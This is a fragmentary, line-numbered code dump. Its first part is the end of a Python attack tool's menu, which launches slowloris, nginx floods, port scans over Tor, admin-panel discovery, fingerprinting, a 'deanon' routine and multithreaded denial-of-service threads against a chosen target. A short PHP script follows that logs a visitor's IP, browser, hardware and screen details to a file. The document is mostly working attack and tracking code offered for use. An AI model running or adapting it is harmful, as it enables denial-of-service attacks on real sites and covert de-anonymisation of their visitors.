309 | data = requests.get(host + '?find&host=' + target1, headers=headers, proxies=proxies).text
310 | admin = re.findall(r'(.*?)', data, re.DOTALL)
311 | print(Fore.GREEN + ' Admin panel: ' + admin + '\n')
312 | exit()
313 | elif(attack == '4'):
314 | threads(slowloris, thread, target, count)
315 | exit()
316 | elif(attack == '5'):
317 | data = requests.get(host + '?nginx&host=' + target +'&req=' + count, headers=headers, proxies=proxies)
318 | print(Fore.WHITE + ' Start attack nginx')
319 | exit()
320 | elif(attack == '6'):
321 | linkgrab(target)
322 | exit()
323 | elif(attack == '7'):
324 | ports = [25, 22, 80, 21, 22, 23, 53, 443, 110, 1433, 3306]
325 | for i in ports:
326 | pscan(target1, i, 9050)
327 | exit()
328 | elif(attack == '8'):
329 | data = requests.get(host + '?head&host=' + target, headers=headers, proxies=proxies).text
330 | head = re.findall(r'', data, re.DOTALL)
331 | for x in head: print(Fore.GREEN + x)
332 | exit()
333 | elif(attack == '9'):
334 | fingerprint(target1, 9050)
335 | exit()
336 | elif(attack == '10'):
337 | deanon()
338 | exit()
339 |
340 | print(Fore.WHITE + ' Start DoS')
341 |
342 | threads = []
343 | for n in range(int(thread)):
344 | t1 = threading.Thread(target=attack1, args=(target1, 9050))
345 | t2 = threading.Thread(target=attack2, args=(target, 9050))
346 | t3 = threading.Thread(target=attack3, args=(exitnode, 80))
347 |
348 | t1.daemon = True
349 | t2.daemon = True
350 | t3.daemon = True
351 |
352 |
353 | t1.start()
354 | t2.start()
355 | t3.start()
356 |
357 |
358 | threads.append(t1)
359 | threads.append(t2)
360 | threads.append(t3)
361 |
362 |
363 |
364 | try:
365 | while 1:
366 | time.sleep(2)
367 | pass
368 | except KeyboardInterrupt:
369 | print(Fore.WHITE + ' \nDone')
370 |
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1 |
93 |
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/php/info.php:
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1 | $ptf,
14 | 'browser' => $brw,
15 | 'cores' => $cc,
16 | 'ram' => $ram,
17 | 'vendor' => $ven,
18 | 'render' => $ren,
19 | 'ip' => $ip,
20 | 'ht' => $ht,
21 | 'wd' => $wd,
22 | 'os' => $os);
23 | $jdata = json_encode($data);
24 | $f = fopen('C:\xampp\htdocs\e\2.txt', 'w+');
25 | fwrite($f, $jdata);
26 | fclose($f);
27 |
28 | ?>
29 |
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